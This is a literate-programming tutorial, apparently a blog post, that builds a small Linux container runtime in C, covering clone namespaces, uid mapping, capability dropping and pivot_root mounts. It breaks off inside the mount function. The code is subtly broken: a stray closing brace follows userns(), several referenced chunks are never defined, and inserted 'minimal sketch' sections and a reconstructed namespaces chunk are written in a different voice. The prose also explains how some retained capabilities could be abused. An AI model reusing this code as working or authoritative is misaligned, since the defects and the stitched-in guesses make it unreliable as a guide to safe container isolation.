Linux containers in 500 lines of code

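I've used Linux containers directly and indirectly for years, but I wanted to become more familiar with them. So I wrote some code. This used to be 500 lines of code, I swear, but I've revised it some since publishing; I've ended up with about 70 lines more.

I wanted specifically to find a minimal set of restrictions to run untrusted code. This isn't how you should approach containers on anything with any exposure: you should restrict everything you can. But I think it's important to know which permissions are categorically unsafe! I've tried to back up what I'm saying with links to code or to people I trust, but I'd love to know if I missed anything.

This is a noweb-style piece of literate code. References named <<x>> will be expanded to the code block named x. You can find the tangled source here. This document is an orgmode document; you can find its source here. This document and this code are licensed under the GPLv3; you can find its text here.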

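Container setup

There are several complementary and overlapping mechanisms that make up modern Linux containers. Roughly,

namespaces are used to group kernel objects into different sets that can be accessed by specific process trees. For example, pid namespaces limit the view of the process list to the processes within the namespace. There are several different kinds of namespaces. I'll go into this more later.
capabilities are used here to set some coarse limits on what uid 0 can do.
cgroups is a mechanism to limit usage of resources like memory, disk IO, and CPU time.
setrlimit is another mechanism for limiting resource usage. It's older than cgroups, but can do some things cgroups can't.

These are all Linux kernel mechanisms. Seccomp, capabilities, and setrlimit are all done with system calls. cgroups is accessed through a filesystem.

There's a lot here, and the scope of each mechanism is pretty unclear. They overlap a lot, and it's tricky to find the best way to limit things. User namespaces are somewhat new, and promise to unify a lot of this behavior. But unfortunately compiling the kernel with user namespaces enabled complicates things. Compiling with user namespaces changes the semantics of capabilities system-wide, which could cause more problems or at least confusion [1]. There have been a large number of privilege-escalation bugs exposed by user namespaces. "Understanding and Hardening Linux Containers" explains:

Despite the large upsides the user namespace provides in terms of security, due to the sensitive nature of the user namespace, somewhat conflicting security models and large amount of new code, several serious vulnerabilities have been discovered and new vulnerabilities have unfortunately continued to be discovered. These deal with both the implementation of user namespaces itself or allow the illegitimate or unintended use of the user namespace to perform a privilege escalation. Often these issues present themselves on systems where containers are not being used, and where the kernel version is recent enough to support user namespaces.

It's turned off by default in Linux at the time of this writing [2], but many distributions apply patches to turn it on in a limited way [3].

But all of these issues apply to hosts with user namespaces compiled in; it doesn't really matter whether we use user namespaces or not, especially since I'll be preventing nested user namespaces. So I'll only use a user namespace if they're available.

(The user-namespace handling in this code was originally pretty broken. Jann Horn in particular gave great feedback. Thanks!)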

`contained.c`

This program can be used like this, to run /misc/img/bin/sh in /misc/img as root:

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m ~/misc/busybox-img/ -u 0 -c /bin/sh
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.oQ5jOY...done.
=> trying a user namespace...writing /proc/32627/uid_map...writing /proc/32627/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
/ # whoami
root
/ # hostname
05fe5c-three-of-pentacles
/ # exit
=> cleaning cgroups...done.

So, a skeleton for it:

contained.c
/* -*- compile-command: "gcc -Wall -Werror -lcap -lseccomp contained.c -o contained" -*- */
/* This code is licensed under the GPLv3. You can find its text here:
   https://www.gnu.org/licenses/gpl-3.0.en.html */


#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <pwd.h>
#include <sched.h>
#include <seccomp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/capability.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <linux/capability.h>
#include <linux/limits.h>

struct child_config {
	int argc;
	uid_t uid;
	int fd;
	char *hostname;
	char **argv;
	char *mount_dir;
};

<<capabilities>>

<<mounts>>

<<syscalls>>

<<resources>>

<<child>>

<<choose-hostname>>

int main (int argc, char **argv)
{
	struct child_config config = {0};
	int err = 0;
	int option = 0;
	int sockets[2] = {0};
	pid_t child_pid = 0;
	int last_optind = 0;
	while ((option = getopt(argc, argv, "c:m:u:"))) {
		switch (option) {
		case 'c':
			config.argc = argc - last_optind - 1;
			config.argv = &argv[argc - config.argc];
			goto finish_options;
		case 'm':
			config.mount_dir = optarg;
			break;
		case 'u':
			if (sscanf(optarg, "%d", &config.uid) != 1) {
				fprintf(stderr, "badly-formatted uid: %s\n", optarg);
				goto usage;
			}
			break;
		default:
			goto usage;
		}
		last_optind = optind;
	}
finish_options:
	if (!config.argc) goto usage;
	if (!config.mount_dir) goto usage;

<<check-linux-version>>

	char hostname[256] = {0};
	if (choose_hostname(hostname, sizeof(hostname)))
		goto error;
	config.hostname = hostname;

<<namespaces>>

	goto cleanup;
usage:
	fprintf(stderr, "Usage: %s -u -1 -m . -c /bin/sh ~\n", argv[0]);
error:
	err = 1;
cleanup:
	if (sockets[0]) close(sockets[0]);
	if (sockets[1]) close(sockets[1]);
	return err;
}

Since I'll be blacklisting system calls and capabilities, it's important to make sure there aren't any new ones.

<<check-linux-version>> =

	fprintf(stderr, "=> validating Linux version...");
	struct utsname host = {0};
	if (uname(&host)) {
		fprintf(stderr, "failed: %m\n");
		goto cleanup;
	}
	int major = -1;
	int minor = -1;
	if (sscanf(host.release, "%u.%u.", &major, &minor) != 2) {
		fprintf(stderr, "weird release format: %s\n", host.release);
		goto cleanup;
	}
	if (major != 4 || (minor != 7 && minor != 8)) {
		fprintf(stderr, "expected 4.7.x or 4.8.x: %s\n", host.release);
		goto cleanup;
	}
	if (strcmp("x86_64", host.machine)) {
		fprintf(stderr, "expected x86_64: %s\n", host.machine);
		goto cleanup;
	}
	fprintf(stderr, "%s on %s.\n", host.release, host.machine);
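
The version check boils down to parsing two numbers out of the uname release string and comparing them against a whitelist. A minimal sketch of that logic as standalone functions, so it can be tried without running the rest of the program; parse_release and release_is_supported are hypothetical helper names, not part of contained.c:

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper (not in contained.c): pull "major.minor" out of a
 * uname release string such as "4.7.10-1-grsec".
 * Returns 0 on success, -1 if the string does not start with two
 * dot-separated unsigned numbers. */
int parse_release(const char *release, unsigned *major, unsigned *minor)
{
	assert(release != NULL);
	if (sscanf(release, "%u.%u", major, minor) != 2)
		return -1;
	return 0;
}

/* Same whitelist as the check above: only 4.7.x and 4.8.x pass.
 * Returns 1 if the release is accepted, 0 otherwise. */
int release_is_supported(const char *release)
{
	unsigned major = 0, minor = 0;
	if (parse_release(release, &major, &minor))
		return 0;
	return major == 4 && (minor == 7 || minor == 8);
}
```

Passing host.release from uname to release_is_supported would give the same accept/reject decision as the inline check. A whitelist fails closed: a kernel newer than the ones audited is rejected rather than trusted.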

(This had a bug. CaptainJey on Reddit let me know. Thanks!)

And I'm not at 500 lines of code yet, so I think I have some room to build nice hostnames.

<<choose-hostname>> =

int choose_hostname(char *buff, size_t len)
{
	static const char *suits[] = { "swords", "wands", "pentacles", "cups" };
	static const char *minor[] = {
		"ace", "two", "three", "four", "five", "six", "seven", "eight",
		"nine", "ten", "page", "knight", "queen", "king"
	};
	static const char *major[] = {
		"fool", "magician", "high-priestess", "empress", "emperor",
		"hierophant", "lovers", "chariot", "strength", "hermit",
		"wheel", "justice", "hanged-man", "death", "temperance",
		"devil", "tower", "star", "moon", "sun", "judgment", "world"
	};
	struct timespec now = {0};
	clock_gettime(CLOCK_MONOTONIC, &now);
	size_t ix = now.tv_nsec % 78;
	if (ix < sizeof(major) / sizeof(*major)) {
		snprintf(buff, len, "%05lx-%s", now.tv_sec, major[ix]);
	} else {
		ix -= sizeof(major) / sizeof(*major);
		snprintf(buff, len,
			 "%05lxc-%s-of-%s",
			 now.tv_sec,
			 minor[ix % (sizeof(minor) / sizeof(*minor))],
			 suits[ix / (sizeof(minor) / sizeof(*minor))]);
	}
	return 0;
}

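Namespaces

clone is the system call behind fork() et al. It's also the key to all of this. Conceptually we want to create a process with different properties than its parent: it should be able to mount a different /, set its own hostname, and do other things. We'll specify all of this by passing flags to clone [4].

The child needs to send some messages to the parent, so we'll initialize a socketpair, and then make sure the child only receives access to one end.

<<namespaces>> +=

	if (socketpair(AF_LOCAL, SOCK_SEQPACKET, 0, sockets)) {
		fprintf(stderr, "socketpair failed: %m\n");
		goto error;
	}
	if (fcntl(sockets[0], F_SETFD, FD_CLOEXEC)) {
		fprintf(stderr, "fcntl failed: %m\n");
		goto error;
	}
	config.fd = sockets[1];

But first we need to set up room for a stack. We'll execve later, which will actually set up the stack again, so this is only temporary [5].

<<namespaces>> +=

	#define STACK_SIZE (1024 * 1024)

	char *stack = 0;
	if (!(stack = malloc(STACK_SIZE))) {
		fprintf(stderr, "=> malloc failed, out of memory?\n");
		goto error;
	}

We'll also prepare the cgroup for this process tree. More on this later.

<<namespaces>> +=

	if (resources(&config)) {
		err = 1;
		goto clear_resources;
	}

We'll namespace the mounts, pids, IPC data structures, network devices, and hostname / domain name. I'll go into these more in the code for capabilities, cgroups, and syscalls.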

<<namespaces>> +=

	int flags = CLONE_NEWNS
		| CLONE_NEWCGROUP
		| CLONE_NEWPID
		| CLONE_NEWIPC
		| CLONE_NEWNET
		| CLONE_NEWUTS;

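Stacks on x86, and on almost everything else Linux runs on, grow downwards, so we'll add STACK_SIZE to get a pointer just below the end [6]. We also | the flags with SIGCHLD so that we can wait on the child.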

<<namespaces>> +=

	if ((child_pid = clone(child, stack + STACK_SIZE, flags | SIGCHLD, &config)) == -1) {
		fprintf(stderr, "=> clone failed! %m\n");
		err = 1;
		goto clear_resources;
	}
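
The stack arithmetic and the SIGCHLD flag can be tried in isolation. A minimal sketch, assuming glibc's clone wrapper and passing no namespace flags so that it runs without privileges; demo_child, run_clone_demo, and DEMO_STACK_SIZE are hypothetical names for illustration only:

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>

#define DEMO_STACK_SIZE (1024 * 1024)

/* Child entry point: runs on the stack handed to clone(). */
static int demo_child(void *arg)
{
	return *(int *)arg;	/* the return value becomes the exit status */
}

/* Clone a child with only SIGCHLD set (no CLONE_NEW* flags), wait for
 * it, and return its exit status, or -1 on any error. */
int run_clone_demo(int exit_code)
{
	assert(exit_code >= 0 && exit_code <= 255);
	char *stack = malloc(DEMO_STACK_SIZE);
	if (!stack)
		return -1;
	/* The stack grows down, so clone() wants the address just past
	 * the end of the allocation, not its start. */
	pid_t pid = clone(demo_child, stack + DEMO_STACK_SIZE, SIGCHLD, &exit_code);
	if (pid == -1) {
		free(stack);
		return -1;
	}
	int status = 0;
	/* SIGCHLD in the flags is what makes a plain waitpid() work. */
	pid_t waited = waitpid(pid, &status, 0);
	free(stack);
	if (waited == -1 || !WIFEXITED(status))
		return -1;
	return WEXITSTATUS(status);
}
```

Because CLONE_VM is not set, the child gets its own copy of the address space, so reading exit_code through the pointer is safe there. Adding the CLONE_NEW* flags from the chunk above to the third argument is what would require root or a user namespace.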

Close and zero the child's socket, so that if something breaks we don't leave an open fd, possibly causing the child or the parent to hang.

<<namespaces>> +=

	close(sockets[1]);
	sockets[1] = 0;

The parent process will configure the child's user namespace and then pause until the child process tree exits [7].

<<child>> +=

#define USERNS_OFFSET 10000
#define USERNS_COUNT 2000

int handle_child_uid_map (pid_t child_pid, int fd)
{
	int uid_map = 0;
	int has_userns = -1;
	if (read(fd, &has_userns, sizeof(has_userns)) != sizeof(has_userns)) {
		fprintf(stderr, "couldn't read from child!\n");
		return -1;
	}
	if (has_userns) {
		char path[PATH_MAX] = {0};
		for (char **file = (char *[]) { "uid_map", "gid_map", 0 }; *file; file++) {
			if (snprintf(path, sizeof(path), "/proc/%d/%s", child_pid, *file)
			    > sizeof(path)) {
				fprintf(stderr, "snprintf too big? %m\n");
				return -1;
			}
			fprintf(stderr, "writing %s...", path);
			if ((uid_map = open(path, O_WRONLY)) == -1) {
				fprintf(stderr, "open failed: %m\n");
				return -1;
			}
			if (dprintf(uid_map, "0 %d %d\n", USERNS_OFFSET, USERNS_COUNT) == -1) {
				fprintf(stderr, "dprintf failed: %m\n");
				close(uid_map);
				return -1;
			}
			close(uid_map);
		}
	}
	if (write(fd, & (int) { 0 }, sizeof(int)) != sizeof(int)) {
		fprintf(stderr, "couldn't write: %m\n");
		return -1;
	}
	return 0;
}

The remaining piece of <<namespaces>> on the parent side is not shown above. Judging from the clear_resources label that the earlier chunks jump to, and from the free_resources function defined later, it has to look roughly like this: call handle_child_uid_map, kill the child if that fails, wait for it, and release the cgroups and the stack.

<<namespaces>> +=

	if (handle_child_uid_map(child_pid, sockets[0])) {
		err = 1;
		goto kill_and_finish_child;
	}

	goto finish_child;
kill_and_finish_child:
	if (child_pid) kill(child_pid, SIGKILL);
finish_child:;
	int child_status = 0;
	waitpid(child_pid, &child_status, 0);
	err |= WEXITSTATUS(child_status);
clear_resources:
	free_resources(&config);
	free(stack);

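The child process will send a message to the parent process about whether it should set uid and gid mappings. If that works, it will setgroups, setresgid, and setresuid. Both setgroups and setresgid are necessary here since there are two separate group mechanisms on Linux [9]. I'm also assuming here that every uid has a corresponding gid, which is common but not necessarily universal.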

<<child>> +=

int userns(struct child_config *config)
{
	fprintf(stderr, "=> trying a user namespace...");
	int has_userns = !unshare(CLONE_NEWUSER);
	if (write(config->fd, &has_userns, sizeof(has_userns)) != sizeof(has_userns)) {
		fprintf(stderr, "couldn't write: %m\n");
		return -1;
	}
	int result = 0;
	if (read(config->fd, &result, sizeof(result)) != sizeof(result)) {
		fprintf(stderr, "couldn't read: %m\n");
		return -1;
	}
	if (result) return -1;
	if (has_userns) {
		fprintf(stderr, "done.\n");
	} else {
		fprintf(stderr, "unsupported? continuing.\n");
	}
	fprintf(stderr, "=> switching to uid %d / gid %d...", config->uid, config->uid);
	if (setgroups(1, & (gid_t) { config->uid }) ||
	    setresgid(config->uid, config->uid, config->uid) ||
	    setresuid(config->uid, config->uid, config->uid)) {
		fprintf(stderr, "%m\n");
		return -1;
	}
	fprintf(stderr, "done.\n");
	return 0;
}
}
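
The parent/child handshake is a two-message protocol over the socketpair: the child reports one int, then blocks until the parent answers with one int. A minimal sketch of just that exchange, using fork instead of clone and doing no uid_map work, so it runs unprivileged; run_handshake_demo is a hypothetical name:

```c
#include <assert.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs the two-message handshake between a forked child and the parent.
 * Returns the value the parent received from the child, or -1 on error. */
int run_handshake_demo(int child_has_userns)
{
	assert(child_has_userns == 0 || child_has_userns == 1);
	int sockets[2] = {0};
	if (socketpair(AF_LOCAL, SOCK_SEQPACKET, 0, sockets))
		return -1;
	pid_t pid = fork();
	if (pid == -1) {
		close(sockets[0]);
		close(sockets[1]);
		return -1;
	}
	if (pid == 0) {
		/* Child: report, then block until the parent replies. */
		int reply = -1;
		close(sockets[0]);
		if (write(sockets[1], &child_has_userns, sizeof(int)) != sizeof(int)
		    || read(sockets[1], &reply, sizeof(reply)) != sizeof(reply))
			_exit(2);
		_exit(reply ? 1 : 0);
	}
	/* Parent: keep only its own end, as contained.c does. */
	close(sockets[1]);
	int seen = -1, ok = 0, status = 0;
	if (read(sockets[0], &seen, sizeof(seen)) != sizeof(seen))
		seen = -1;
	/* This is the point where contained.c writes uid_map and gid_map. */
	if (write(sockets[0], &ok, sizeof(ok)) != sizeof(ok))
		seen = -1;
	close(sockets[0]);
	if (waitpid(pid, &status, 0) == -1
	    || !WIFEXITED(status) || WEXITSTATUS(status) != 0)
		return -1;
	return seen;
}
```

SOCK_SEQPACKET preserves message boundaries, so each read returns exactly one int-sized message. The blocking read in the child is what guarantees it does not call setresuid before the parent has finished writing the maps.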

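And this is where the child process ends up after clone. We'll perform all of our setup, switch users and groups, and then load the executable. The order is important here: we can't change mounts without certain capabilities, we can't unshare after we limit the system calls, and so on.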

<<child>> +=

int child(void *arg)
{
	struct child_config *config = arg;
	if (sethostname(config->hostname, strlen(config->hostname))
	    || mounts(config)
	    || userns(config)
	    || capabilities()
	    || syscalls()) {
		close(config->fd);
		return -1;
	}
	if (close(config->fd)) {
		fprintf(stderr, "close failed: %m\n");
		return -1;
	}
	if (execve(config->argv[0], config->argv, NULL)) {
		fprintf(stderr, "execve failed! %m.\n");
		return -1;
	}
	return 0;
}

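Capabilities

Capabilities subdivide the property of "being root" on Linux. It's useful to compartmentalize privileges so that, for example, a process can allocate network devices (CAP_NET_ADMIN) but not read all files (CAP_DAC_OVERRIDE). I'll use them here to drop the ones we don't want.

But not all of "being root" is subdivided into capabilities. For example, some things remain allowed for root even after capabilities have been dropped [10]. There are a lot of things like this: this is part of why we need other restrictions besides capabilities.

It's also important to think about how we're dropping capabilities. man 7 capabilities has an algorithm for us: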

	During  an   execve(2),  the   kernel  calculates   the  new
	capabilities of the process using the following algorithm:

	    P'(ambient) = (file is privileged) ? 0 : P(ambient)

	    P'(permitted) = (P(inheritable) & F(inheritable)) |
					(F(permitted) & cap_bset) | P'(ambient)

	    P'(effective) = F(effective) ? P'(permitted) : P'(ambient)

	    P'(inheritable) = P(inheritable)    [i.e., unchanged]

	where:

	    P         denotes the  value of a thread  capability set
			    before the execve(2)

	    P'        denotes the  value of a thread  capability set
			    after the execve(2)

	    F         denotes a file capability set

	    cap_bset  is the  value of  the capability  bounding set
			    (described below).

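We'd like P'(ambient) and P(inheritable) to be empty, and P'(permitted) and P(effective) to only include the capabilities above. This is achievable by doing the following:

Clearing our own inheritable set. This clears the ambient set; man 7 capabilities says "The ambient capability set obeys the invariant that no capability can ever be ambient if it is not both permitted and inheritable." This also clears the child's inheritable set.
Clearing the bounding set. This limits the file capabilities we'll gain when we execve, and the rest are limited by clearing the inheritable and ambient sets.

If we were to only drop our own effective, permitted, and inheritable sets, we'd regain the permissions in the child file's capabilities. This is how bash can call ping, for example [11].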
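
The execve transformation quoted from man 7 capabilities can be modelled with plain bitmasks, which makes the role of the bounding set easy to see. A minimal sketch under stated assumptions: the struct names, CAP_BIT, and DEMO_CAP_NET_RAW are hypothetical, the model follows only the four formulas quoted above, and it ignores the kernel's special handling of uid 0 and of securebits.

```c
#include <assert.h>
#include <stdint.h>

#define CAP_BIT(n) (1ULL << (n))
#define DEMO_CAP_NET_RAW 13	/* numeric value of CAP_NET_RAW */

/* Thread capability sets (P in the man page). */
struct thread_caps {
	uint64_t permitted, inheritable, effective, ambient;
};

/* File capability sets (F in the man page). */
struct file_caps {
	uint64_t permitted, inheritable;
	int effective;	/* F(effective) is a single bit */
	int privileged;	/* file has capabilities or is setuid/setgid */
};

/* Apply the four formulas quoted above and return P'. */
struct thread_caps caps_after_execve(struct thread_caps p, struct file_caps f,
				     uint64_t cap_bset)
{
	struct thread_caps out = {0};
	out.ambient = f.privileged ? 0 : p.ambient;
	out.permitted = (p.inheritable & f.inheritable)
		| (f.permitted & cap_bset) | out.ambient;
	out.effective = f.effective ? out.permitted : out.ambient;
	out.inheritable = p.inheritable;
	/* By construction, every ambient capability is also permitted. */
	assert((out.ambient & ~out.permitted) == 0);
	return out;
}
```

With all thread sets empty but a full bounding set, a file whose permitted set holds CAP_NET_RAW hands that capability back to the process; masking the bit out of cap_bset makes the same execve yield nothing. That is the reason the bounding set has to be dropped in addition to the inheritable set.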

Dropped capabilities

<<capabilities>> +=

int capabilities()
{
	fprintf(stderr, "=> dropping capabilities...");

CAP_AUDIT_CONTROL, _READ, and _WRITE allow access to the audit system of the kernel (i.e. functions like audit_set_enabled, usually used with auditctl). The kernel prevents messages that normally require CAP_AUDIT_CONTROL outside of the first pid namespace, but it does allow messages that would require CAP_AUDIT_READ and CAP_AUDIT_WRITE from any namespace [12]. So let's drop them all. We especially want to drop CAP_AUDIT_READ, since it isn't namespaced [13] and may contain important information, but CAP_AUDIT_WRITE may also allow the contained process to falsify logs or DOS the audit system.

<<capabilities>> +=

	int drop_caps[] = {
		CAP_AUDIT_CONTROL,
		CAP_AUDIT_READ,
		CAP_AUDIT_WRITE,

CAP_BLOCK_SUSPEND lets programs prevent the system from suspending, either with EPOLLWAKEUP or /proc/sys/wake_lock [14]. Suspend isn't namespaced, so we'd like to prevent this.

<<capabilities>> +=

		CAP_BLOCK_SUSPEND,

CAP_DAC_READ_SEARCH lets programs call open_by_handle_at with an arbitrary struct file_handle *. struct file_handle is in theory an opaque type, but in practice it corresponds to inode numbers. So it's easy to brute-force them and read arbitrary files. This was used by Sebastian Krahmer to write a program that reads arbitrary system files from within Docker in 2014 [15].

<<capabilities>> +=

		CAP_DAC_READ_SEARCH,

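CAP_FSETID, without user namespacing, allows the process to modify a setuid executable without removing the setuid bit. This is pretty dangerous! It means that if we include a setuid binary in a container, it's easy for us to accidentally leave a dangerous setuid root binary on our disk, which any user can use to escalate privileges [16].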

<<capabilities>> +=

		CAP_FSETID,

CAP_IPC_LOCK can be used to lock more of a process's own memory than would normally be allowed [17], which could be a way to deny service.

<<capabilities>> +=

		CAP_IPC_LOCK,
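
CAP_MAC_ADMIN and CAP_MAC_OVERRIDE are used by the mandatory access control systems Apparmor, SELinux, and SMACK to restrict access to their settings. These aren't namespaced, so they could be used by the contained programs to circumvent system-wide access control.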

<<capabilities>> +=

		CAP_MAC_ADMIN,
		CAP_MAC_OVERRIDE,

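CAP_MKNOD, without user namespacing, allows programs to create device files corresponding to real-world devices. This includes creating new device files for existing hardware. If this capability were not dropped, a contained process could re-create the hard disk device, remount it, and read or write to it [18].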

<<capabilities>> +=

		CAP_MKNOD,

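I was worried that CAP_SETFCAP could be used to add a capability to an executable and execve it, but it's not actually possible for a process to set capabilities it doesn't have [19]. But! An executable altered this way could be executed by any unsandboxed user, so I think it undermines the security of the system.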

<<capabilities>> +=

		CAP_SETFCAP,

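CAP_SYSLOG lets users perform destructive actions against the syslog. Importantly, it doesn't prevent contained processes from reading the syslog, which could be risky. It also exposes kernel addresses, which could be used to circumvent kernel address layout randomization [20].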

<<capabilities>> +=

		CAP_SYSLOG,

CAP_SYS_ADMIN allows many behaviors! We don't want most of them (mount, vm86, etc). Some would be nice to have (sethostname, mount for bind mounts...), but the extra complexity doesn't seem worth it.

<<capabilities>> +=

		CAP_SYS_ADMIN,

CAP_SYS_BOOT allows programs to restart the system (the reboot syscall) and load new kernels (the kexec_load and kexec_file syscalls) [21]. We absolutely don't want this. reboot is user-namespaced, and the kexec* functions only work in the root user namespace, but neither of those helps us.

<<capabilities>> +=

		CAP_SYS_BOOT,

CAP_SYS_MODULE is used by the syscalls delete_module, init_module, and finit_module [22], by the code for kmod [23], and by the code for loading device modules with ioctl [24].

<<capabilities>> +=

		CAP_SYS_MODULE,

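CAP_SYS_NICE allows processes to set a higher priority on given pids than the default [25]. The default kernel scheduler doesn't know anything about pid namespaces, so it's possible for a contained process to deny service to the rest of the system [26].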

<<capabilities>> +=

		CAP_SYS_NICE,

CAP_SYS_RAWIO allows full access to the host system's memory with /proc/kcore, /dev/mem, and /dev/kmem [27], but a contained process would need mknod to access these within the namespace [28]. But it also allows things like iopl and ioperm, which give raw access to the IO ports [29].

<<capabilities>> +=

		CAP_SYS_RAWIO,

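CAP_SYS_RESOURCE specifically allows circumventing kernel-wide limits, so we probably should drop it [30]. But I don't think this can do more than DOS the kernel, in general [31].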

<<capabilities>> +=

		CAP_SYS_RESOURCE,

CAP_SYS_TIME: setting the time isn't namespaced, so we should prevent contained processes from altering the system-wide time [32].

<<capabilities>> +=

		CAP_SYS_TIME,

CAP_WAKE_ALARM, like CAP_BLOCK_SUSPEND, lets the contained process interfere with suspend [33], and we'd like to prevent that.

<<capabilities>> +=

		CAP_WAKE_ALARM
	};

<<capabilities>> +=

	size_t num_caps = sizeof(drop_caps) / sizeof(*drop_caps);
	fprintf(stderr, "bounding...");
	for (size_t i = 0; i < num_caps; i++) {
		if (prctl(PR_CAPBSET_DROP, drop_caps[i], 0, 0, 0)) {
			fprintf(stderr, "prctl failed: %m\n");
			return 1;
		}
	}
	fprintf(stderr, "inheritable...");
	cap_t caps = NULL;
	if (!(caps = cap_get_proc())
	    || cap_set_flag(caps, CAP_INHERITABLE, num_caps, drop_caps, CAP_CLEAR)
	    || cap_set_proc(caps)) {
		fprintf(stderr, "failed: %m\n");
		if (caps) cap_free(caps);
		return 1;
	}
	cap_free(caps);
	fprintf(stderr, "done.\n");
	return 0;
}
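
Whether a capability really left the bounding set can be checked from inside the process with prctl(PR_CAPBSET_READ, ...), which needs no privileges. A minimal sketch; cap_in_bounding_set and count_still_bounded are hypothetical helpers, not part of contained.c:

```c
#include <assert.h>
#include <stddef.h>
#include <linux/capability.h>
#include <sys/prctl.h>

/* Returns 1 if `cap` is still in the calling thread's bounding set,
 * 0 if it has been dropped, and -1 on error. */
int cap_in_bounding_set(int cap)
{
	return prctl(PR_CAPBSET_READ, cap, 0, 0, 0);
}

/* Counts how many of the listed capabilities are still in the bounding
 * set; after a successful drop of the whole list this is 0.
 * Returns -1 if any lookup fails. */
int count_still_bounded(const int *caps, size_t n)
{
	assert(n == 0 || caps != NULL);
	int remaining = 0;
	for (size_t i = 0; i < n; i++) {
		int present = cap_in_bounding_set(caps[i]);
		if (present == -1)
			return -1;
		remaining += present;
	}
	return remaining;
}
```

Calling count_still_bounded(drop_caps, num_caps) just before the final return of capabilities() would be one way to confirm that the PR_CAPBSET_DROP loop had the intended effect.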

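Retained capabilities

It's important to track the capabilities I'm not dropping, too.

I've heard in multiple places [34] that CAP_DAC_OVERRIDE might expose the same functionality as CAP_DAC_READ_SEARCH (i.e., open_by_handle_at), but as far as I can tell that's not true. shocker.c didn't get anywhere with only CAP_DAC_OVERRIDE [35], and the only usage in the kernel is in the Unix permission-checking code [36]. So my understanding is that CAP_DAC_OVERRIDE does not on its own allow processes to read outside of their mount namespaces ("DAC" or "Discretionary Access Control" here refers to ordinary UNIX permissions).

CAP_FOWNER, CAP_LEASE, and CAP_LINUX_IMMUTABLE operate on files inside of the mount namespace.

Likewise, CAP_SYS_PACCT allows processes to switch accounting on and off for themselves. The acct system call takes a path to log to (which must be within the mount namespace), and only operates on the calling process. We're not using process accounting in our containerization, so turning it off should be harmless as well [37].

CAP_IPC_OWNER is only used by functions that respect IPC namespaces [38]; since we're in a separate IPC namespace from the host, we can allow this.

CAP_NET_ADMIN lets processes create network devices; CAP_NET_BIND_SERVICE lets processes bind to low ports on those devices; CAP_NET_RAW lets processes send raw packets on those devices. Since we're going to isolate the networking with a virtual bridge, and the contained process is within a network namespace, these shouldn't be an issue [39]. I wondered whether we could re-create existing devices, as with mknod, but I don't think it's possible [40].

CAP_SYS_PTRACE doesn't allow ptrace across pid namespaces [41]. CAP_KILL doesn't allow signals across pid namespaces [42].

CAP_SETUID and CAP_SETGID have similar behaviors [43]:

Make arbitrary manipulations of process UIDs and GIDs and supplementary GID list: this only applies within the namespace.
Forge UID (GID) when passing socket credentials via UNIX domain sockets: the mount namespace should prevent us from being able to read the host system's UNIX domain sockets.
Write a user (group) ID mapping in a user namespace (see user_namespaces(7)): this is /proc/self/uid_map, which will be hidden inside the container.

CAP_SETPCAP only lets processes add or drop capabilities that they effectively already have; man 7 capabilities says:

If file capabilities are supported: add any capability from the calling thread's bounding set to its inheritable set; drop capabilities from the bounding set (via prctl(2) PR_CAPBSET_DROP); make changes to the securebits flags.

We've already dropped everything relevant from the bounding set, and dropping other capabilities should be harmless.

CAP_SYS_CHROOT is traditionally abused by changing root to a directory with a setuid root binary and tampered-with dynamic libraries [44]. Additionally, it could be used to escape a chroot "jail" [45]. Neither of these should be relevant in our setup, so this should be harmless.

Brad Spengler says in "False Boundaries and Arbitrary Code Execution" that CAP_SYS_TTYCONFIG can "temporarily change the keyboard mapping of an administrator's tty via the KDSETKEYCODE ioctl to cause a different command to be executed than intended", but this again is an ioctl against a device that should not be accessible in the mount namespace.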

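Mounts

The child process is in its own mount namespace, so we can unmount things that it specifically shouldn't have access to. Here's how:

Create a temporary directory, and another one inside of it.
Bind mount the user's mount argument onto the temporary directory.
pivot_root, making the bind mount our root and mounting the old root onto the inner temporary directory.
umount the old root, and remove the inner temporary directory.

But first we'll remount everything with MS_PRIVATE. This is mostly a convenience, so that the bind mount is invisible outside of our namespace.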

<<mounts>> =

<<pivot-root>>

int mounts(struct child_config *config)
{
	fprintf(stderr, "=> remounting everything with MS_PRIVATE...");
	if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) {
		fprintf(stderr, "failed! %m\n");
		return -1;
	}
	fprintf(stderr, "remounted.\n");

	fprintf(stderr, "=> making a temp directory and a bind mount there...");
	char mount_dir[] = "/tmp/tmp.XXXXXX";
	if (!mkdtemp(mount_dir)) {
		fprintf(stderr, "failed making a directory!\n");
		return -1;
	}

	if (mount(config->mount_dir, mount_dir, NULL, MS_BIND | MS_PRIVATE, NULL)) {
		fprintf(stderr, "bind mount failed!\n");
		return -1;
	}

	char inner_mount_dir[] = "/tmp/tmp.XXXXXX/oldroot.XXXXXX";
	memcpy(inner_mount_dir, mount_dir, sizeof(mount_dir) - 1);
	if (!mkdtemp(inner_mount_dir)) {
		fprintf(stderr, "failed making the inner directory!\n");
		return -1;
	}
	fprintf(stderr, "done.\n");

	fprintf(stderr, "=> pivoting root...");
	if (pivot_root(mount_dir, inner_mount_dir)) {
		fprintf(stderr, "failed!\n");
		return -1;
	}
	fprintf(stderr, "done.\n");

	char *old_root_dir = basename(inner_mount_dir);
	char old_root[sizeof(inner_mount_dir) + 1] = { "/" };
	strcpy(&old_root[1], old_root_dir);

	fprintf(stderr, "=> unmounting %s...", old_root);
	if (chdir("/")) {
		fprintf(stderr, "chdir failed! %m\n");
		return -1;
	}
	if (umount2(old_root, MNT_DETACH)) {
		fprintf(stderr, "umount failed! %m\n");
		return -1;
	}
	if (rmdir(old_root)) {
		fprintf(stderr, "rmdir failed! %m\n");
		return -1;
	}
